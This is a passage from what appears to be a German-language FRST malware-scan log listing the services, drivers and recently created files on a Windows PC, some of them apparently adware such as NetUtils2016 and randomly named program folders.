R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [372272 2016-12-29] (Avira Operations GmbH & Co. KG)
S4 AvmSwitchUsb; C:\Program Files (x86)\avmwlanstick\AVMSwitchUsb.exe [125440 2015-10-01] () [Datei ist nicht signiert]
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-08-11] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-08-11] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [462360 2016-08-11] (BlueStack Systems, Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2017-03-06] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\Windows\SysWOW64\NetUtils2016.exe [470592 2017-03-06] ()
S2 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-06-07] (Plays.tv, LLC)
S2 PrefersSecure; C:\ProgramData\PrefersSecure\Nettrans.exe [44544 2017-03-02] () [Datei ist nicht signiert]
S3 VSStandardCollectorService140; F:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-07-17] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [176464 2017-02-05] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [148032 2017-02-05] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2016-04-04] (Avira Operations GmbH & Co. KG)
S3 avmeject; C:\Windows\System32\drivers\avmeject.sys [14120 2015-10-01] (AVM Berlin)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [79696 2016-04-04] (Avira Operations GmbH & Co. KG)
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-08-11] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
R3 fwlanusb6_860; C:\Windows\System32\DRIVERS\fwlanusb6_860.sys [2274336 2015-10-01] (AVM GmbH)
R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-03-06] () <==== ACHTUNG
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-03-11 16:39 - 2017-03-11 16:39 - 00000000 ____D C:\FRST
2017-03-11 16:39 - 2017-03-11 16:39 - 00000000 _____ C:\Windows\6952232240d0bd227f0ed883c0990089.exe
2017-03-11 15:21 - 2017-03-11 15:21 - 00000000 ____D C:\Windows\LastGood
2017-03-11 15:20 - 2017-03-11 15:20 - 00000000 ____D C:\Program Files (x86)\InstallShield Installation Information
2017-03-11 15:20 - 2017-03-11 15:20 - 00000000 ____D C:\Program Files (x86)\Etron Technology
2017-03-11 15:20 - 2013-08-05 16:37 - 00094208 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronXHCI.sys
2017-03-11 15:20 - 2013-08-05 16:37 - 00065408 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronHub3.sys
2017-03-11 14:15 - 2017-03-11 14:15 - 00000000 ___DL C:\Users\Dominik\AppData\LocalLow\PlayReady
2017-03-11 13:21 - 2017-03-11 13:21 - 00000000 ____D C:\Users\Dominik\AppData\Local\ElevatedDiagnostics
2017-03-11 13:20 - 2017-03-11 13:20 - 00099988 _____ C:\Windows\ntbtlog.txt
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-09 20:46 - 2017-03-09 20:46 - 00040304 _____ (Greatis Software) C:\Windows\SysWOW64\Drivers\Partizan.sys
2017-03-09 20:41 - 2017-03-09 20:41 - 00000000 ____D C:\@RestoreQuarantine
2017-03-09 20:36 - 2017-03-09 20:36 - 00000000 ____D C:\ProgramData\RegRun
2017-03-07 19:32 - 2017-03-09 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-03-06 20:54 - 2017-03-06 20:54 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Adobe
2017-03-06 20:34 - 2017-03-06 20:54 - 00000000 ____D C:\Users\Dominik\AppData\Local\Adobe
2017-03-06 20:34 - 2017-03-06 20:54 - 00000000 ____D C:\ProgramData\Adobe
2017-03-06 20:34 - 2017-03-06 20:34 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-03-06 20:28 - 2017-03-09 20:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-06 20:28 - 2017-03-09 20:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-03-06 20:28 - 2017-03-09 20:07 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Mozilla
2017-03-06 20:28 - 2017-03-06 20:36 - 00000000 ____D C:\Users\Dominik\AppData\Local\Mozilla
2017-03-06 20:17 - 2017-03-09 21:15 - 00002263 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-03-06 20:13 - 2017-03-06 20:13 - 00001996 _____ C:\Windows\System32\Tasks\MiovucyN0s
2017-03-06 20:07 - 2017-03-06 20:07 - 00000000 _____ C:\Windows\system32\__000000014217CFE5__C0000005.dmp
2017-03-06 20:05 - 2017-03-06 20:05 - 00000037 _____ C:\Windows\wininit.ini
2017-03-06 20:02 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\PE8WPINWZP
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\HDWallPaper
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\VDGBYFEBFY
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\MJJZVBDT3G
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\LRJ6346S7K
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\ADO2UTX8BS
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\7OHOBHWLP9
2017-03-06 19:59 - 2017-03-06 20:00 - 00000000 ____D C:\Users\Dominik\AppData\Local\app
2017-03-06 19:59 - 2017-03-06 19:59 - 00000000 ____D C:\Users\Dominik\AppData\Local\WikiThemes
2017-03-06 19:58 - 2017-03-06 19:58 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Opera Software
2017-03-06 19:58 - 2017-03-06 19:58 - 00000000 ____D C:\Users\Dominik\AppData\Local\Opera Software
2017-03-06 19:57 - 2017-03-06 19:57 - 00002398 _____ C:\Windows\SysWOW64\findit.xml
2017-03-06 19:56 - 2017-03-11 15:14 - 00625272 _____ C:\Windows\system32\NetUtils2016.dll
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Electrum
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Voyasollam
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\PrefsSecure
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\PrefersSecure
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Logic Cramble
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\WS4B8H5XSR
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\JSO2JLBN37
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\DIN8PO21L4
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\BMJWYKNX12
2017-03-06 19:56 - 2017-03-06 20:13 - 00000000 ____D C:\Users\Dominik\AppData\Local\YlPack
2017-03-06 19:56 - 2017-03-06 20:07 - 00000000 ____D C:\Windows\system32\SSL
2017-03-06 19:56 - 2017-03-06 20:05 - 00000000 ____D C:\Program Files (x86)\1dd9d7ce-c714-4189-b5bb-85c0f6065caf1488826604
2017-03-06 19:56 - 2017-03-06 19:59 - 00909944 _____ C:\Windows\system32\Drivers\NetUtils2016.sys
2017-03-06 19:56 - 2017-03-06 19:59 - 00003174 _____ C:\Windows\System32\Tasks\HDWallPaper
2017-03-06 19:56 - 2017-03-06 19:56 - 07288832 _____ C:\Users\Dominik\AppData\Roaming\agent.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 01891621 _____ C:\Users\Dominik\AppData\Roaming\Softdom.tst
2017-03-06 19:56 - 2017-03-06 19:56 - 00471968 _____ C:\Windows\system32\ns.block
2017-03-06 19:56 - 2017-03-06 19:56 - 00470592 _____ C:\Windows\SysWOW64\NetUtils2016.exe
2017-03-06 19:56 - 2017-03-06 19:56 - 00278509 _____ C:\Users\Dominik\AppData\Roaming\FAXMATCORE.del
2017-03-06 19:56 - 2017-03-06 19:56 - 00278509 _____ C:\Users\Dominik\AppData\Roaming\DALTRON.del
2017-03-06 19:56 - 2017-03-06 19:56 - 00140288 _____ C:\Users\Dominik\AppData\Roaming\Installer.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00126464 _____ C:\Users\Dominik\AppData\Roaming\noah.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00070752 _____ C:\Users\Dominik\AppData\Roaming\Config.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00024300 _____ C:\Windows\System32\Tasks\{0A050547-0A0E-797E-0A11-087A0E0E117E}
2017-03-06 19:56 - 2017-03-06 19:56 - 00018432 _____ C:\Users\Dominik\AppData\Roaming\Main.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00016272 _____ C:\Users\Dominik\AppData\Roaming\InstallationConfiguration.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00005568 _____ C:\Users\Dominik\AppData\Roaming\md.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00003054 _____ C:\Windows\System32\Tasks\hostTask
2017-03-06 19:56 - 2017-03-06 19:56 - 00000728 __RSH C:\ProgramData\ntuser.pol
2017-03-06 19:56 - 2017-03-06 19:56 - 00000000 ____D C:\Windows\SysWOW64\sstmp
2017-03-06 19:56 - 2017-03-06 19:56 - 00000000 ____D C:\Windows\system32\sstmp
2017-03-06 19:55 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\CIA9KT8HZ1
2017-03-06 19:55 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\BXDVXYNZA6
2017-03-06 19:54 - 2017-03-09 21:09 - 00000000 ____D C:\Users\Dominik\AppData\Local\Cumospthejise
2017-03-06 19:54 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files (x86)\Ckerctyjolely Server
2017-03-06 19:54 - 2017-03-06 19:54 - 00006022 _____ C:\Windows\System32\Tasks\Ckerctyjolely Server
2017-03-06 19:54 - 2017-03-06 19:54 - 00005052 _____ C:\Windows\System32\Tasks\Reosyavasp
2017-03-06 19:54 - 2017-03-06 19:54 - 00003538 _____ C:\Windows\System32\Tasks\PPI Update
2017-03-06 19:47 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016-Tools
2017-03-06 19:47 - 2017-03-06 19:47 - 00002506 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002502 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002481 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002392 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2017-03-06 19:45 - 2017-03-06 19:45 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-05 21:21 - 2017-03-05 21:21 - 00002760 _____ C:\Windows\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2017-02-25 18:45 - 2017-02-25 19:06 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\MP3 Quality Modifier
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\Users\Dominik\AppData\Local\AvgSetupLog
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\ProgramData\Avg
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\Program Files (x86)\AVG
2017-02-25 18:44 - 2017-02-25 18:45 - 00000000 ____D C:\Users\Dominik\AppData\Local\Avg
2017-02-19 13:33 - 2017-02-19 13:43 - 00000000 ____D C:\Users\Dominik\AppData\Local\Fallout4
2017-02-18 15:35 - 2017-02-18 15:35 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\TowerUpStudios
2017-02-18 15:26 - 2017-02-18 15:26 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Cybreath
2017-02-16 19:55 - 2017-02-16 19:55 - 00003218 _____ C:\Windows\System32\Tasks\{1476CE1F-B723-412A-B1E8-B7ABA1D628C5}
2017-02-13 20:10 - 2017-02-15 17:22 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\Tracing
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\AppData\Local\TeamSpeak 3
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\.TeamSpeak 3
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\.QtWebEngineProcess
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\ProgramData\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-02-13 19:37 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2017-02-13 19:37 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-02-13 19:37 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2017-02-13 19:37 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2017-02-13 19:37 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2017-02-13 19:37 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2017-02-13 19:37 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2017-02-13 19:37 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2017-02-13 19:37 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2017-02-13 19:37 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2017-02-13 19:37 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2017-02-13 19:37 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
